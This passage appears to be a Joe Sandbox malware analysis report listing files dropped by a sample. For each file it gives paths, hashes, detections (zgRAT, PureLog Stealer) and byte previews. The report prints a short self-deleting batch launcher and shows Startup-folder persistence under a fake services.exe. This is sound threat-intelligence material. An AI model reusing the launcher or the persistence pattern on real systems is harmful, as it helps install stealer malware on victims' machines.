                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                          MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                          SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                          SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                          SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):179
                                                          Entropy (8bit):5.2963226954334
                                                          Encrypted:false
                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZjl+fmcRmnRgLtNSBktKcKZG1t+kiE2J5xAI0FPN:hCRLuVFOOr+DED+dRmn3KOZG1wkn23fA
                                                          MD5:23FE47B92A86BEDD61FC3E4BBAF2A300
                                                          SHA1:B26C530592DA0AC9C0AF567C9E75985A9A89AFB0
                                                          SHA-256:8EECBCF138D99E281F3842D215327E6F38F460E88B036FB041F0B232FB04169B
                                                          SHA-512:46093C6C6C48327D9BDF2AA566C4B65BB85049ACB9654FC8A0AADDD7CF8C98AAA08E0074E6E240ACC75DD283D239037DAFE02D564DB27B370BF2D37F60B11DAE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4sBxboqxXs.bat"

                                                          C:\Users\user\AppData\Local\Temp\g3XcAN3Zvu

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.293660689688184
                                                          Encrypted:false
                                                          SSDEEP:3:L228Rp/iUupZ:C28P6UuX
                                                          MD5:B18736B8B09741644F9A321D6D35FD7E
                                                          SHA1:1778D7BAA74E5BD04A7E246F815EC36FB28CB8D8
                                                          SHA-256:C6EEFC182D8259CB42938A88BACA7E9F5B507489B67DA779C1EE0D8D43649E8B
                                                          SHA-512:26BB31CE2BC321D1B211B10CA176C1D2EB10F74BE74E554031D3DF906D53320054D44FA3BE1D5B9DBE0893C86D3231BECA21632DC1417CAA082F2C879AE7188E
                                                          Malicious:false
                                                          Preview:fUdA8SmnYtLZToFq7L0cuLtZB

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c5b4cb5e9653cc

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with very long lines (800), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):800
                                                          Entropy (8bit):5.882674247263806
                                                          Encrypted:false
                                                          SSDEEP:24:gbDiDFqExoWHRt7WjyqCiw6uzfDv5J5AMZNrSYLG:hDtoeRhUuz9JxrrSf
                                                          MD5:BF694B47DD23740370A5AF332385E3C7
                                                          SHA1:5FD7ED45AD5B154BB5B921CD94A8001B0460B40E
                                                          SHA-256:9645387FD451F984F20E368055B00DD5FB2CD7F7B6AD5C353259B3525B01D458
                                                          SHA-512:D98EE2AA6245BF8F04AB6384FFD6AF0DF561EEA48B9B903158B3998C5CE9AFB3003C875A883BC5A14BB49A82DFBDE022334D8A5A22E2D26D4AE4A549944FF63C
                                                          Malicious:false
                                                          Preview:NQ2nLcbs3shHWg91DVnswhB3HgPrDhQDX5JKZ3X0hB9QaGOR1wzcEiBpO8foMuoWceuaXybJ7xLuivdAR8zRry9y4d6bXtnxXmy6Wx4DUpeQXQHdffWO4Xonf5g31AvOJYX56goeEw7BTsbnVd52WZ298KbaRALT4QH93Mg802JIZmUwe2hYF31ugX7vFOMDkoHClcuJ66BePtkV0o5YcwNAZWcfPv3mpGhvfRLCIYcI1Wfwxm5aSykyaHmO9O3LDZyILy0id2QEUFJC1qsnzdT1ftUXo6D3eQFbiWk8wX7ZhgdV7kXSgQWkF6ncec3gzWjEAseeFt1cf4T9Q9aEivWO4eWlsIeTeakL6ZUPF3MxY3ELmoLeBy8E9VJfV2v7Ph8FTIC1oL8pijzAaK8E6ASpcgLlPz3MHOi1592emUzzzSfafJFL3rBOOSmw7alzSwiTA8EaSeclKdzKAuGGusSZNTmmWFgLt9gDtMZgEo2ZPZEvccvMUfFkdIFrVcEN8Q2L6wayUjCFz3KyP1K3TU1O46kkGsLmjpb8h3zqC62uc9uj8RceRK3oZnR9MzsmYagKcMQWBd1WbGv4LAmzQqUZvxi3lzeMOPWCdjGwAFcyTgMT2WxLN3VrGGZpnXuM9oIMtsam40yKNgFOlPBPBT9V3o6WKbInVQyoY9jJ5LRWFLekBKEXWeLqoxSFwEbcrKz7ra0lq1TzBnPsJWV9WvR0EHAkreW1typ4Wh2kUdreLVoBhj5asbG6382jaP3MebFN7VWmevp3Dxpsd8DHj6JSstBXpSJE

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*;..........I;.. ...`;...@.. ........................;...........@.................................PI;.K....`;.p.....................;...................................................... ............... ..H............text....);.. ...*;................. ..`.rsrc...p....`;......,;.............@....reloc........;......0;.............@..B.................I;.....H.......8...|.......y........l0..H;......................................0..........(.... ........8........E....M...N.......)...8H...(.... ....~....{p...9....& ....8....(.... ....~....{....:....& ....8....*(.... ....8........0.......... ........8........E....................F...8........~....(T...~....(X... ....?u... ....~....{....:....& ....8....~....(L... .... .... ....s....~....(P....... ....~....{....:a...& ....8V...r...ps....z*~....:.... ....~....{....:,...& ....8!......

                                                          C:\Users\user\Desktop\AfbbeRiC.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Joe Sandbox View:
                                                          • Filename: 5R28W1PAnS.exe, Detection: malicious, Browse
                                                          • Filename: iqA8j9yGcd.exe, Detection: malicious, Browse
                                                          • Filename: TwfUz3FuO7.exe, Detection: malicious, Browse
                                                          • Filename: z3yAH0LL5e.exe, Detection: malicious, Browse
                                                          • Filename: BUKHuBek8M.exe, Detection: malicious, Browse
                                                          • Filename: Componentsession.exe, Detection: malicious, Browse
                                                          • Filename: -#U00bc).exe, Detection: malicious, Browse
                                                          • Filename: Loader.exe, Detection: malicious, Browse
                                                          • Filename: SpotifyStartupTask2.exe, Detection: malicious, Browse
                                                          • Filename: R6ZdHnUZee.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\BOUJPwoA.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\BpvsVBNg.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\BySrFogd.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\CLwRlwDv.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.4346552043530165
                                                          Encrypted:false
                                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\FxsAqTHc.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\GcNqxydU.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\GuUJMTWW.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ILIJsLjp.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\IQRzjLYS.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                          C:\Users\user\Desktop\IuBreppm.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\JrdzzpEh.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\KcbhohwK.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
